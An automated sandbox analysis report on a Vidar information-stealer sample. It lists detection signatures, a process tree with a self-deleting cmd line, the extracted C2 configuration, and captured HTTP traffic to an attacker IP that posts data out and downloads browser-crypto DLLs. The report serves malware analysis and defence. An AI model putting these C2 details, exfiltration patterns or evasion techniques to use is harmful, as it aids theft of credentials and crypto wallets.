Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1442218
MD5:b580ff2d001291bf58bdd23a058ef21b
SHA1:5013dc6e38bd9d1cbe2f7fc0d983b6812f3f2351
SHA256:80994b791b545ba6a8c906e046ab6ae79c5875a4f42da07085113b4b6f22f8ca
Tags:exe
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Yara detected Powershell download and execute
Yara detected Vidar
Yara detected Vidar stealer
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Opens network shares
Searches for specific processes (likely to inject)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6856 cmdline: "C:\Users\user\Desktop\file.exe" MD5: B580FF2D001291BF58BDD23A058EF21B)
    • conhost.exe (PID: 6860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 3272 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • RegAsm.exe (PID: 5984 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • cmd.exe (PID: 2860 cmdline: "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\GHIJJEGDBFII" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 2116 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199686524322"], "Botnet": "9ed287469c3721fd5caf346580b2cf0d", "Version": "9.7"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_2Yara detected VidarJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulationDetects executables containing potential Windows Defender anti-emulation checksditekSHen
      • 0x221f0:$s1: JohnDoe
      • 0x31f80:$s1: JohnDoe
      • 0x221e8:$s2: HAL9TH
      00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
        00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            Click to see the 6 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.file.exe.70aac0.1.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              0.2.file.exe.70aac0.1.unpackINDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulationDetects executables containing potential Windows Defender anti-emulation checksditekSHen
              • 0x201f0:$s1: JohnDoe
              • 0x201e8:$s2: HAL9TH
              3.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                3.2.RegAsm.exe.400000.0.raw.unpackINDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulationDetects executables containing potential Windows Defender anti-emulation checksditekSHen
                • 0x221f0:$s1: JohnDoe
                • 0x31f80:$s1: JohnDoe
                • 0x221e8:$s2: HAL9TH
                0.2.file.exe.70aac0.1.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                  Click to see the 5 entries

                  Sigma Signatures

                  No Sigma rule has matched

                  Snort Signatures

                  No Snort rule has matched

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: file.exeAvira: detected
                  Antivirus detection for URL or domain
                  Source: https://steamcommunity.coSophos S4: Label: illegal phishing domain
                  Source: https://95.217.240.101/nss3.dllAvira URL Cloud: Label: malware
                  Source: https://95.217.240.101/nss3.dll2Avira URL Cloud: Label: malware
                  Source: https://95.217.240.101/freebl3.dllAvira URL Cloud: Label: malware
                  Source: https://95.217.240.101/softokn3.dllAvira URL Cloud: Label: malware
                  Source: https://95.217.240.101/msvcp140.dllUAvira URL Cloud: Label: malware
                  Source: https://95.217.240.101Avira URL Cloud: Label: malware
                  Source: https://95.217.240.101/freebl3.dllsAvira URL Cloud: Label: malware
                  Source: https://95.217.240.101/msvcp140.dllAvira URL Cloud: Label: malware
                  Source: https://steamcommunity.coAvira URL Cloud: Label: phishing
                  Source: https://t.me/k0monoAvira URL Cloud: Label: malware
                  Source: https://steamcommunity.com/profiles/76561199686524322/badgesAvira URL Cloud: Label: malware
                  Source: https://steamcommunity.com/profiles/76561199686524322/inventory/Avira URL Cloud: Label: malware
                  Source: https://95.217.240.101/mozglue.dllAvira URL Cloud: Label: malware
                  Source: https://95.217.240.101/softokn3.dllKAvira URL Cloud: Label: malware
                  Source: https://95.217.240.101/sqlx.dllAvira URL Cloud: Label: malware
                  Source: https://steamcommunity.com/profiles/76561199686524322Avira URL Cloud: Label: malware
                  Source: https://95.217.240.101/vAvira URL Cloud: Label: malware
                  Found malware configuration
                  Source: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199686524322"], "Botnet": "9ed287469c3721fd5caf346580b2cf0d", "Version": "9.7"}
                  Machine Learning detection for sample
                  Source: file.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E22BA FreeConsole,GetCurrentThreadId,PostQuitMessage,GetClipBox,CryptDecrypt,std::_Throw_Cpp_error,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004062A5 CryptUnprotectData,LocalAlloc,LocalFree,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00406242 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004082DE memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,PK11_FreeSlot,lstrcat,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040245C memset,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00410DAC CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6D6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C82A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8244C0 PK11_PubEncrypt,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7F4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C824440 PK11_PrivDecrypt,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8725B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C80E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C82A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C808670 PK11_ExportEncryptedPrivKeyInfo,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C84A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,
                  Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 23.194.234.100:443 -> 192.168.2.4:49730 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 95.217.240.101:443 -> 192.168.2.4:49731 version: TLS 1.2
                  Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr
                  Source: Binary string: freebl3.pdb source: freebl3[1].dll.3.dr, freebl3.dll.3.dr
                  Source: Binary string: freebl3.pdbp source: freebl3[1].dll.3.dr, freebl3.dll.3.dr
                  Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000003.00000002.2047601334.000000006C8FF000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr
                  Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.3.dr, softokn3.dll.3.dr
                  Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.3.dr, vcruntime140[1].dll.3.dr
                  Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.3.dr, msvcp140.dll.3.dr
                  Source: Binary string: nss3.pdb source: RegAsm.exe, 00000003.00000002.2047601334.000000006C8FF000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr
                  Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000003.00000002.2043950908.0000000019258000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2040755834.00000000132E9000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.3.dr
                  Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr
                  Source: Binary string: softokn3.pdb source: softokn3[1].dll.3.dr, softokn3.dll.3.dr
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006F81B2 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00401162 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004162AF _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004153F6 _EH_prolog,wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,memset,lstrcat,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040B463 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004094E5 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040C679 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00415AC2 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00409F72 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00409900 _EH_prolog,StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040A981 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00415E66 _EH_prolog,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00415843 _EH_prolog,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

                  Networking

                  barindex
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199686524322
                  Source: global trafficHTTP traffic detected: GET /profiles/76561199686524322 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                  Source: Joe Sandbox ViewIP Address: 23.194.234.100 23.194.234.100
                  Source: Joe Sandbox ViewASN Name: AKAMAI-ASUS AKAMAI-ASUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                  Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGHJEBGHJKEBFHIJDHCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FHCAEGCBFHJDGCBFHDAFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKFHCFBGIIJKFHJDHDHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DBAAFIDGDAAAAAAAAKEBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GDAAKFIDGIEGDGDHIDAKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 7081Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /sqlx.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HDAFIIDAKJDGDHIDAKJJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GDAAKFIDGIEGDGDHIDAKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 1529Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CBFIJEGIDBGIECAKKEGDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFHCGHJDBFIIDGDHIJDBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JKFIDGDHJEGIEBFHDGDGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FCFBFHIEBKJKFHIEBFBAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CGIDAAAKJJDBGCBFCBGIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGHJEBGHJKEBFHIJDHCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 453Connection: Keep-AliveCache-Control: no-cache
